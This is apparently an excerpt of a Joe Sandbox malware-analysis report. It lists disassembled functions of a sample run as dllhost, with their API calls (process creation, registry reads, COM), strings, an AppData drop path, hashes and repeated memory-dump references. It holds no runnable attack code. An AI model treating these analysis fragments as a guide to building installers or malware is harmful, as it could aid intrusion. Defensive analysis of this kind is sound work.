                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue
                                                                              • String ID: : Completed
                                                                              • API String ID: 3356406503-2954849223
                                                                              • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                              • Instruction ID: 8ef6f3e619af491bbf380fd7d91826ebef08e06ae3c58d0c48453c9b41c80383
                                                                              • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                              • Instruction Fuzzy Hash: BF014872500209FBDF218F51C909ADB3BA8EB55364F01802AFD1AA61A1D678D964CBA4
                                                                              Function 00405831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                                                              • CloseHandle.KERNEL32(?), ref: 00405867
                                                                              Strings
                                                                              • Error launching installer, xrefs: 00405844
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateHandleProcess
                                                                              • String ID: Error launching installer
                                                                              • API String ID: 3712363035-66219284
                                                                              • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                              • Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
                                                                              • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                              • Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C
                                                                              Function 00406D8B Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                                              • Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
                                                                              • Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                                              • Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
                                                                              Function 00406F8C Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                                              • Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
                                                                              • Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                                              • Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                                                              Function 00406CA2 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                                              • Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
                                                                              • Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                                              • Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55
                                                                              Function 004067A7 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                                              • Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
                                                                              • Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                                              • Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45
                                                                              Function 00406BF5 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                                              • Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
                                                                              • Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                                              • Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44
                                                                              Function 00406D13 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                                              • Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
                                                                              • Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                                              • Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45
                                                                              Function 00406C5F Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                                              • Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
                                                                              • Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                                              • Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44
                                                                              Function 004024F2 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                                                              • RegCloseKey.KERNEL32(?), ref: 00402551
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Enum$CloseValue
                                                                              • String ID:
                                                                              • API String ID: 397863658-0
                                                                              • Opcode ID: 5fe39f6a887c8af29e07c615d6c30983e444cdbe436708b2e3fcea9e6197479e
                                                                              • Instruction ID: caf525ecc09255a736170ff5365d3a7771f075d5505ff7476addd39d58865d97
                                                                              • Opcode Fuzzy Hash: 5fe39f6a887c8af29e07c615d6c30983e444cdbe436708b2e3fcea9e6197479e
                                                                              • Instruction Fuzzy Hash: 4A017171904104EFE7159FA5DE89ABFB6BCEF44348F10403EF105A62D0DAB84E459B69
                                                                              Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?), ref: 0040217D
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea, xrefs: 004021BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInstance
                                                                              • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea
                                                                              • API String ID: 542301482-1965738620
                                                                              • Opcode ID: 891fa9c4e5cabca34a4c7ad1f8027ea32194b00e0f3f0a60056e0d7117170fd1
                                                                              • Instruction ID: 8d58e3acc7b173ba9b06918936dfe92dd1a067fa61399e551ad1d720d45e9931
                                                                              • Opcode Fuzzy Hash: 891fa9c4e5cabca34a4c7ad1f8027ea32194b00e0f3f0a60056e0d7117170fd1
                                                                              • Instruction Fuzzy Hash: A64148B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                              Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                              • RegCloseKey.KERNEL32(?), ref: 00402551
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3356406503-0
                                                                              • Opcode ID: 1159d50a24b9b01b67aa24e1c7db0f716e147c0a3d96e1b9d2c227e5af43628e
                                                                              • Instruction ID: 1ba1cbfe7526e94493429aa356f7c232dcc3bab2ce10746d05ed9864f28b52f9
                                                                              • Opcode Fuzzy Hash: 1159d50a24b9b01b67aa24e1c7db0f716e147c0a3d96e1b9d2c227e5af43628e
                                                                              • Instruction Fuzzy Hash: C2119131900209EFEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D6B84A45DB5A
                                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
